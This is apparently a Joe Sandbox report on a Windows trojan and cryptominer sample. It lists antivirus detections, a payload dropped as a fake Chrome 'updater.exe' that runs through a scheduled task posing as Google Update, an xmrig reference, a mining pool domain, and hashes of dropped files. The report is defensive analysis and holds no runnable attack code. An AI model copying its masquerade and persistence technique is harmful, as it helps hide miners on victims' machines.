h2qWqtD73F.exe	100%	Avira	HEUR/AGEN.1329646
h2qWqtD73F.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\piukhnngkvtj.tmp	100%	Avira	HEUR/AGEN.1362356
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	100%	Avira	HEUR/AGEN.1329646
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	55%	ReversingLabs	Win64.Trojan.Whisperer

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/02/trust	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1403630784.0000022851A20000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.	powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://crl.mC&	powershell.exe, 00000006.00000002.1404686932.0000022851D80000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000006.00000002.1373300100.0000022839608000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.1396657039.0000022849456000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cacerts.digicert	lsass.exe, 00000009.00000000.1348006527.000001CB32A89000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://xmrig.com/docs/algorithms	updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.microsoft.np	powershell.exe, 00000006.00000002.1404686932.0000022851E13000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 00000009.00000002.2637267063.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347954124.000001CB32A4E000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 00000009.00000002.2636409774.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1347929432.000001CB32A2F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.1373300100.00000228393E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528505
Start date and time:	2024-10-08 00:23:34 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	32
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	h2qWqtD73F.exe renamed because original name is a hash value
Original Sample Name:	d0c2dd0e059c5011ed2eee4c65122177.exe
Detection:	MAL
Classification:	mal100.troj.evad.mine.winEXE@22/79@0/0
EGA Information:	Successful, ratio: 90.5%
HCA Information:	Successful, ratio: 68% Number of executed functions: 72 Number of non-executed functions: 394
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, pool.hashvault.pro, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target h2qWqtD73F.exe, PID 7828 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8124 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: h2qWqtD73F.exe

Simulations

Behavior and APIs

Time	Type	Description
00:24:37	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
18:24:28	API Interceptor	1x Sleep call for process: h2qWqtD73F.exe modified
18:24:30	API Interceptor	80x Sleep call for process: powershell.exe modified
18:24:41	API Interceptor	1x Sleep call for process: updater.exe modified
18:24:47	API Interceptor	5412x Sleep call for process: svchost.exe modified
18:25:06	API Interceptor	292853x Sleep call for process: lsass.exe modified
18:25:06	API Interceptor	379190x Sleep call for process: winlogon.exe modified
18:25:10	API Interceptor	356949x Sleep call for process: dwm.exe modified
18:25:19	API Interceptor	1668x Sleep call for process: dialer.exe modified
18:25:26	API Interceptor	36x Sleep call for process: spoolsv.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	https://login.stmarytx.edu/cas/logout?service=http%3A%2F%2Fgoogle.com%2Famp%2Fmatrikaengineeringworks.com/hebc/?#?m=bWVsaXNzYWdAd2Utd29ybGR3aWRlLmNvbQ==	Get hash	malicious	Unknown	Browse	199.232.214.172
	WiTqtf1aiE.exe	Get hash	malicious	LummaC, Vidar	Browse	199.232.214.172
	https://s.craft.me/yB5midhwwaHUPW	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://entertaininmotionre.pro/IQCm/	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	199.232.214.172
	FdjDPFGTZS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	199.232.214.172
	Aew8SXjXEb.exe	Get hash	malicious	Stealc	Browse	199.232.214.172
	Adobe-Setup.msi	Get hash	malicious	Korplug	Browse	199.232.210.172
	https://dsdhie.org/dsjhem	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	7796
Entropy (8bit):	7.971943145771426
Encrypted:	false
SSDEEP:	192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
MD5:	FB60E1AFE48764E6BF78719C07813D32
SHA1:	A1DC74EF8495C9A1489DD937659B5C2875027E16
SHA-256:	EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
SHA-512:	92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
Malicious:	false
Preview:	MSCF....t.......,...................I........E.........J.R .pinrules.stl..>N.#..ECK.[.T...O......l.$.)V.a...v.d.H...&.D.YA,(+Y...A.......c]."ka-.XW..I.....w..\|..9.........{...\|d..v.T..w.TMZ.\|...).F.rtAm.....f......T........n.z.:.t&.} EH.S.)2...SP.../~.Q..d..".@.5..r(..M.Zs..~{...>...p.p.^....[/p..~.....@......f..E0....9.i...Ds..^.d...N.R@..P%..9... .4Z)...z..h...@.......C<.]6....([.c=.9..l.....@..4......f.......z.!..0.`Jp.."$I..?`......H...].2...$....9v1./g.&.aIX.A..A.w..p.*.`r.........'!e.. ..d...H.d.hu`.\!w.Z..E.$....$..\|1..@.OC!c.......%.....p.uxC.~@....`...#.~ .P.!.Gb`)i...L..0.-.K.....xRx.e"..@.....5T..JP^.9.....#aH.E.@2..H..f.H..K...+x..$.WM..H}....=....`.PD:.qgn........I.....]uX..q...D...]n.4..0..b!.....m"a.Lz...d..S%P.I11,..^..".+At..To\@K.....c.h.C.....=...H.Xa...r.A.I..@!..0..eV...\|.h..$."r..hL9TR..}.v%...4).H..[.....r..\|]..+5..Y..I..hN...O=u..8.}U...#S...R..KQ..A..w....X\|.....8b...GC.4..h....6gG.>..}.8....!ql..A..1..X.C.q.j....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.3299129856994254
Encrypted:	false
SSDEEP:	6:kK7W81wNSWsCN+SkQlPlEGYRMY9z+4D1QuflIeyGIla1:i0FkPlE99Si1QyIeek
MD5:	FCCF6992BDB0452A533BC48FE5E7FE44
SHA1:	32CB820CB0BC8C69072D185383392E04DE2C0662
SHA-256:	688DCF08AAE61D8E421176BBA2B350AFEDAF552735A38D015D85C66F4CE049BA
SHA-512:	A0BDC4436A303E3F99A81A71DCDC793EA9FC314BA7300F0038A0E2D7680BE4DCCBDD68361E1358FC16BB56988332EC1A0B79E9A45CD36CF754A3DE5B4B0E5502
Malicious:	false
Preview:	p...... ........,.......(....................................................... ........B@!........(....0."....t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...".8.0.4.2.4.0.2.1.c.7.d.b.d.2.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kpqmiau.ne2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aerkav1p.4hz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_af4wjmrs.atv.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpcxif5k.10e.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_efemmwms.ezy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eufprlp2.ijn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3p3zqr1.sx1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3kk0djh.h23.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvlwjjcu.mof.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_piva5423.e3p.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sj23xulb.tql.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t42lexb5.ubb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uysomedt.40b.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vjxlqzcz.ikq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_winmg2rz.syb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zphkxzjv.ji2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
